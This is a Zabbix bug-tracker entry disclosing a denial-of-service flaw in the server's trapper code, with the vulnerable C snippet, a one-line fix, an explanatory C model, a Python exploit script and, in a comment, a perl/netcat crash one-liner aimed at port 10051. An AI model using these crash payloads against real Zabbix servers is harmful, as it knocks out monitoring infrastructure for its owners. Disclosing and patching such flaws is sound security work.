ZABBIX BUGS AND ISSUES

DoS in Zabbix Server

Details

  • Type: Bug
  • Status: Closed
  • Priority: Critical
  • Resolution: Fixed
  • Affects Version/s: 1.6
  • Fix Version/s: 1.6
  • Component/s: Proxy (P), Server (S)
  • Labels:
    None
  • Environment:
    Zabbix server v1.6.x
  • Zabbix ID:
    NA

Description

While reading Zabbix source code, I found a small error leading to an
easy to exploit denial of service vulnerability (tested in version 1.6.1
as shipped on Ubuntu and 1.6.5 compiled from source).

In src/zabbix_server/trapper/trapper.c, function process_trap() :

/* Make a copy of "s" truncated to 2047 characters */
strscpy(copy,s);

/* Check if there's some ":" in "s" (and not in "copy"!) */
server=(char *)strtok(s,":");

[...]

/* Look for the 1st ":" in "copy" */
value_string=strchr(copy,':');

/* If the 1st ":" in "s" is after offset 2047,
   we get a NULL pointer dereference crash */
value_string=strchr(value_string+1,':');

The patch is trivial : just use "copy" instead of "s" in your check.

server=(char *)strtok(copy,":");

Exploit code :

8<-----------------------------------------------------------------
#!/usr/bin/python

PORT = 10051
HOST = "192.168.2.89"

import socket
import struct

try:
        socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.settimeout(3)
        socket.connect((HOST, PORT))

        header = 'ZBXD\x01'

# DoS in ./src/zabbix_server/trapper/trapper.c
# If first ":" is after 2047 => DoS when reading NULL+1
data = 'A'*2050 + ':B'

size = struct.pack('q', len(data))
socket.send(header + size + data)
        rcvdata = socket.recv(10240)
print rcvdata
except:
        print "FAIL"

socket.close()
8<-----------------------------------------------------------------
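
A reduced model of the check described in process_trap() above, added here as an illustration (it is not Zabbix source code): the delimiter test runs against `s` while the search runs against the truncated `copy`. The names `parse`, `parse_flawed`, `parse_fixed`, `make_input`, `COPY_LEN` and the result codes are hypothetical, `snprintf` and `strchr` stand in for the project's `strscpy` and `strtok`, and the would-be NULL dereference is reported as a return code instead of being executed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define COPY_LEN 2048 /* assumed size: 2047 characters plus NUL, per the report */
enum result { PARSE_OK, PARSE_REJECT, PARSE_NULL_DEREF };

/* check_copy == 0: validate ':' in s, then search copy (the flawed pattern).
 * check_copy == 1: validate the same buffer that is searched (the fix). */
static enum result parse(const char *s, int check_copy)
{
    char copy[COPY_LEN];
    snprintf(copy, sizeof copy, "%s", s);   /* truncating copy */
    if (strchr(check_copy ? copy : s, ':') == NULL)
        return PARSE_REJECT;                /* no delimiter in the checked buffer */
    const char *p = strchr(copy, ':');
    if (p == NULL)
        return PARSE_NULL_DEREF;            /* original would evaluate strchr(NULL + 1, ':') */
    return strchr(p + 1, ':') ? PARSE_OK : PARSE_REJECT;
}

enum result parse_flawed(const char *s) { return parse(s, 0); }
enum result parse_fixed(const char *s)  { return parse(s, 1); }

/* Constructed test input: n filler bytes followed by ":B" (caller frees). */
char *make_input(size_t n)
{
    char *buf = malloc(n + 3);
    if (buf != NULL) {
        memset(buf, 'A', n);
        memcpy(buf + n, ":B", 3);           /* copies ':', 'B' and the NUL */
    }
    return buf;
}

int main(void)
{
    char *late = make_input(2050);
    if (late == NULL)
        return 1;
    printf("normal: flawed=%d fixed=%d\n", parse_flawed("srv:key:1"), parse_fixed("srv:key:1"));
    printf("late:   flawed=%d fixed=%d\n", parse_flawed(late), parse_fixed(late));
    free(late);
    return 0;
}
```

With the delimiter past the truncation point, the flawed variant reaches the NULL case while the fixed variant rejects the message before any pointer arithmetic.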

Activity

Alexander Vladishev added a comment -

Fixed in version pre1.6.6, rev. 7690.

richlv added a comment -

closing all resolved issues

Rafael Gomes added a comment -

I got this error with exploit:

File "166.pl", line 18
data = 'A'*2050 + ':B'
^
SyntaxError: invalid syntax

My Zabbix server 1.6.4 was compiled from source.

Is my version affected too?

richlv added a comment -

as the original comment said, it should be fixed in 1.6.6

ZBX-993#action_16403

richlv added a comment -

let's try full link then... https://support.zabbix.com/browse/ZBX-993#action_16403

Rafael Gomes added a comment -

I just wanna know if my version is affected, because I can't exploit with this code.

Nicob added a comment -

Indentation of the provided exploit code is broken.

Version 1.6.4 (even from source) is affected, but you may try the following PoC :
perl -e 'print "ZBXD\x01" . "A"x2050 . ":B";' | nc -v 127.0.0.1 10051

Rafael Gomes added a comment -

Hi Nicob,

Thanks for your help, but I can't exploit it yet.

When I put your code in server, I didn't get anything and my server is still running

